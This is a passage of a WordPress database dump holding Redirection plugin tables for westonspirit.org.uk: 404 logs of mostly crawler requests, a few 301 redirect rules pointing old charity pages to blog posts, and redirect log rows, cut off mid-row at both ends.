02:48:27','/coharmoniously1080166.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(649,'2021-08-25 02:49:35','/bibliophiles-corner-the-artist-of-disappearance-by-anita-desai','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(650,'2021-08-25 02:49:47','/see-it-to-believe-it-2','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(651,'2021-08-25 02:49:52','/acalephoid1112770.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(652,'2021-08-25 02:51:07','/basiotripsy.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(653,'2021-08-25 02:51:08','/queen-delivers-good-news-for-future-of-state-pension','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(654,'2021-08-25 02:51:41','/hypogynous.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(655,'2021-08-25 02:52:00','/sitemap-index-10.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(656,'2021-08-25 02:52:22','/the-best-of-both-worlds-2','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.94'),(657,'2021-08-25 02:54:11','/Ascolichenes1219497.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(658,'2021-08-25 02:56:09','/lexicologist357216.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(659,'2021-08-25 02:58:31','/Dehwar914976.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(660,'2021-08-25 02:58:55','/boatlip.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(661,'2021-08-25 02:59:57','/circumcision1271008.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(662,'2021-08-25 03:01:25','/lamentory364969.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(663,'2021-08-25 03:10:37','/wp-content/plugins/email-artillery/readme.txt','https://www.westonspirit.org.uk','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',NULL,404,'GET',NULL,'137.74.76.176'),(664,'2021-08-25 03:21:09','/coffee-special-love-the-bean','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(665,'2021-08-25 04:03:04','/2015/','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)',NULL,404,'GET',NULL,'17.121.113.167'),(666,'2021-08-25 04:11:53','/love-coffee-hate-vending','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.197'),(667,'2021-08-25 04:12:46','/love-coffee-hate-vending','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.197'),(668,'2021-08-25 04:13:23','/love-coffee-hate-vending','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.197'),(669,'2021-08-25 04:13:59','/love-coffee-hate-vending','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.197'),(670,'2021-08-25 04:28:11','/dont-forget-the-small-print','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(671,'2021-08-25 05:14:42','/staying-off-the-statins','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(672,'2021-08-25 05:43:44','/pump-up-the-pomp','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)',NULL,404,'GET',NULL,'185.191.171.43'),(673,'2021-08-25 05:51:13','/2014/','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)',NULL,404,'GET',NULL,'17.121.113.208'),(674,'2021-08-25 05:53:49','/out-of-the-woods','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)',NULL,404,'GET',NULL,'185.191.171.43'),(675,'2021-08-25 06:38:35','/staying-off-the-statins','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.1'),(676,'2021-08-25 06:45:59','/handle-with-care','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.116'),(677,'2021-08-25 07:17:33','/make-the-most-of-later-life','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)',NULL,404,'GET',NULL,'17.121.113.171'),(678,'2021-08-25 07:17:56','/get-up-and-go-may','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)',NULL,404,'GET',NULL,'185.191.171.45'),(679,'2021-08-25 07:26:31','/interview-herbie-kretzmer-les-miserables-scriptwriter','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.94'),(680,'2021-08-25 07:41:29','/2014/page/5','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.135.120'),(681,'2021-08-25 07:46:44','/hunt-with-highest-calibre','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.94'),(682,'2021-08-25 08:10:06','/dont-forget-the-small-print','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.94'),(683,'2021-08-25 08:25:33','/2015/page/4','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.118'),(684,'2021-08-25 08:28:26','/2014/07','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.1'),(685,'2021-08-25 08:36:53','/author/westonspirit/page/25','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(686,'2021-08-25 08:44:18','/great-places-to-volunteer/','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; MojeekBot/0.10; +https://www.mojeek.com/bot.html)',NULL,404,'GET',NULL,'5.102.173.71'),(687,'2021-08-25 09:02:19','/2018/07','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60'),(688,'2021-08-25 09:14:52','/get-up-and-go-sandwich-special','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(689,'2021-08-25 09:14:57','/positive-steps','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(690,'2021-08-25 09:15:02','/tailored-by-tradition','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(691,'2021-08-25 09:23:58','/how-to-get-the-funeral-you-want','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.116'),(692,'2021-08-25 09:51:34','/weston_script_pics/2013/05/Monica-Porter-journalist-300x375.jpg','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.116'),(693,'2021-08-25 09:53:50','/2018/01','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.135.120'),(694,'2021-08-25 09:56:36','/why-youth-wants-words-from-the-wise','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(695,'2021-08-25 09:59:05','/category/uk_news/page/12','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.116'),(696,'2021-08-25 10:01:16','/growing-old-can-seriously-damage-your-wealth','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.94'),(697,'2021-08-25 10:03:26','/2014/08','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.135.120'),(698,'2021-08-25 10:06:12','/category/uk_news/page/15','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.118'),(699,'2021-08-25 10:18:04','/2015/page/6','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.94'),(700,'2021-08-25 10:34:59','/smiling-all-the-way-to-the-dentist','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0',NULL,404,'GET',NULL,'185.6.9.148'),(701,'2021-08-25 10:35:07','/putting-the-fun-into-fitness','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0',NULL,404,'GET',NULL,'185.6.9.148'),(702,'2021-08-25 10:35:19','/staying-off-the-statins','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0',NULL,404,'GET',NULL,'185.6.9.148'),(703,'2021-08-25 10:38:13','/2014/06/page/2','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.136.247'),(704,'2021-08-25 10:59:54','/love-or-lust-at-first-sight','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60'),(705,'2021-08-25 11:16:40','/own-your-future-3','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.135.120'),(706,'2021-08-25 11:30:55','/staying-off-the-statins','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0',NULL,404,'GET',NULL,'185.6.9.148'),(707,'2021-08-25 12:19:14','/author/westonspirit/page/18','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.94'),(708,'2021-08-25 12:21:30','/2018/10','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(709,'2021-08-25 12:23:46','/a-place-you-can-aspire-to-retire-in','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.135.120'),(710,'2021-08-25 12:56:07','/category/dentistry','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)',NULL,404,'GET',NULL,'185.191.171.33'),(711,'2021-08-25 12:57:03','/2015/11','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.64'),(712,'2021-08-25 12:59:39','/obituaries','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.49'),(713,'2021-08-25 13:12:05','/ads.txt','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php)',NULL,404,'GET',NULL,'34.203.209.245'),(714,'2021-08-25 13:23:37','/residence-of-royalty','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60');
/*!40000 ALTER TABLE `wp_redirection_404` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_groups`
--

DROP TABLE IF EXISTS `wp_redirection_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_groups` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `tracking` int(11) NOT NULL DEFAULT 1,
  `module_id` int(11) unsigned NOT NULL DEFAULT 0,
  `status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
  `position` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `module_id` (`module_id`),
  KEY `status` (`status`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_groups`
--

LOCK TABLES `wp_redirection_groups` WRITE;
/*!40000 ALTER TABLE `wp_redirection_groups` DISABLE KEYS */;
INSERT INTO `wp_redirection_groups` VALUES (1,'Redirections',1,1,'enabled',0),(2,'Modified Posts',1,1,'enabled',1);
/*!40000 ALTER TABLE `wp_redirection_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_items`
--

DROP TABLE IF EXISTS `wp_redirection_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_items` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `url` mediumtext NOT NULL,
  `match_url` varchar(2000) DEFAULT NULL,
  `match_data` text DEFAULT NULL,
  `regex` int(11) unsigned NOT NULL DEFAULT 0,
  `position` int(11) unsigned NOT NULL DEFAULT 0,
  `last_count` int(10) unsigned NOT NULL DEFAULT 0,
  `last_access` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `group_id` int(11) NOT NULL DEFAULT 0,
  `status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
  `action_type` varchar(20) NOT NULL,
  `action_code` int(11) unsigned NOT NULL,
  `action_data` mediumtext DEFAULT NULL,
  `match_type` varchar(20) NOT NULL,
  `title` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `url` (`url`(191)),
  KEY `status` (`status`),
  KEY `regex` (`regex`),
  KEY `group_idpos` (`group_id`,`position`),
  KEY `group` (`group_id`),
  KEY `match_url` (`match_url`(191))
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_items`
--

LOCK TABLES `wp_redirection_items` WRITE;
/*!40000 ALTER TABLE `wp_redirection_items` DISABLE KEYS */;
INSERT INTO `wp_redirection_items` VALUES (1,'/charity_aboutus/simon.html','/charity_aboutus/simon.html',NULL,0,0,247,'2021-08-19 15:48:52',1,'enabled','url',301,'/the-family-that-laughs-together.asp','url',''),(2,'/londonmarathon','/londonmarathon',NULL,0,1,461,'2021-08-25 09:29:00',1,'enabled','url',301,'/money-talks.asp','url',''),(3,'/home.html','/home.html',NULL,0,2,281,'2021-08-25 01:17:31',1,'enabled','url',301,'/','url',''),(4,'/weston_spirit_contacts.html','/weston_spirit_contacts.html',NULL,0,3,1,'2021-08-19 15:49:12',1,'enabled','url',301,'https://www.westonspirit.org.uk/blogs/the-key-things-to-know-about-drug-detoxing','url',NULL),(5,'/charity_aboutus/facts.html','/charity_aboutus/facts.html',NULL,0,4,2,'2021-08-19 23:37:34',1,'enabled','url',301,'https://www.westonspirit.org.uk/blogs/everything-you-need-to-know-about-property-development','url',NULL),(6,'/charity_helpus/liv_marathon_10k.html','/charity_helpus/liv_marathon_10k.html',NULL,0,5,1,'2021-08-19 15:50:26',1,'enabled','url',301,'https://www.westonspirit.org.uk/health-news','url',NULL),(7,'/can-a-smile-makeover-really-change-your-life','/can-a-smile-makeover-really-change-your-life',NULL,0,6,6,'2021-08-22 12:28:36',1,'enabled','url',301,'https://www.westonspirit.org.uk/contact-us','url',NULL);
/*!40000 ALTER TABLE `wp_redirection_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_logs`
--

DROP TABLE IF EXISTS `wp_redirection_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_logs` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `created` datetime NOT NULL,
  `url` mediumtext NOT NULL,
  `domain` varchar(255) DEFAULT NULL,
  `sent_to` mediumtext DEFAULT NULL,
  `agent` mediumtext DEFAULT NULL,
  `referrer` mediumtext DEFAULT NULL,
  `http_code` int(11) unsigned NOT NULL DEFAULT 0,
  `request_method` varchar(10) DEFAULT NULL,
  `request_data` mediumtext DEFAULT NULL,
  `redirect_by` varchar(50) DEFAULT NULL,
  `redirection_id` int(11) unsigned DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `created` (`created`),
  KEY `redirection_id` (`redirection_id`),
  KEY `ip` (`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=190 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_logs`
--

LOCK TABLES `wp_redirection_logs` WRITE;
/*!40000 ALTER TABLE `wp_redirection_logs` DISABLE KEYS */;
INSERT INTO `wp_redirection_logs` VALUES (167,'2021-08-19 14:21:55','/londonmarathon',NULL,'/money-talks.asp','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,0,NULL,NULL,NULL,2,'185.175.113.72'),(168,'2021-08-19 14:21:59','/home.html',NULL,'/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,0,NULL,NULL,NULL,3,'185.175.113.72'),(169,'2021-08-19 14:22:05','/charity_aboutus/simon.html',NULL,'/the-family-that-laughs-together.asp','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,0,NULL,NULL,NULL,1,'185.175.113.72'),(170,'2021-08-19 15:48:44','/londonmarathon','https://www.westonspirit.org.uk','/money-talks.asp','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,301,'GET',NULL,'redirection',2,'185.175.113.72'),(171,'2021-08-19 15:48:46','/home.html','https://www.westonspirit.org.uk','/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,301,'GET',NULL,'redirection',3,'185.175.113.72'),(172,'2021-08-19 15:48:52','/charity_aboutus/simon.html','https://www.westonspirit.org.uk','/the-family-that-laughs-together.asp','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,301,'GET',NULL,'redirection',1,'185.175.113.72'),(173,'2021-08-19 15:49:12','/weston_spirit_contacts.html','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/blogs/the-key-things-to-know-about-drug-detoxing','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,301,'GET',NULL,'redirection',4,'185.175.113.72'),(174,'2021-08-19 15:49:27','/charity_aboutus/facts.html','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/blogs/everything-you-need-to-know-about-property-development','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,301,'GET',NULL,'redirection',5,'185.175.113.72'),(175,'2021-08-19 15:50:26','/charity_helpus/liv_marathon_10k.html','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/health-news','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,301,'GET',NULL,'redirection',6,'185.175.113.72'),(176,'2021-08-19 15:50:42','/can-a-smile-makeover-really-change-your-life','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/contact-us','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',NULL,301,'GET',NULL,'redirection',7,'185.175.113.72'),(177,'2021-08-19 18:37:09','/can-a-smile-makeover-really-change-your-life','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/contact-us','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,301,'GET',NULL,'redirection',7,'66.249.64.98'),(178,'2021-08-19 21:43:48','/londonmarathon','https://www.westonspirit.org.uk','/money-talks.asp','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,301,'GET',NULL,'redirection',2,'54.36.148.78'),(179,'2021-08-19 23:37:34','/charity_aboutus/facts.html','https://www.westonspirit.org.uk','https://www.westonspirit.org.uk/blogs/everything-you-need-to-know-about-property-development','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,301,'GET',NULL,'redirection',5,'157.90.181.145'),(180,'2021-08-19 23:37:38','/home.html','https://www.westonspirit.org.uk','/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,301,'GET',NULL,'redirection',3,'157.90.181.145'),(181,'2021-08-19 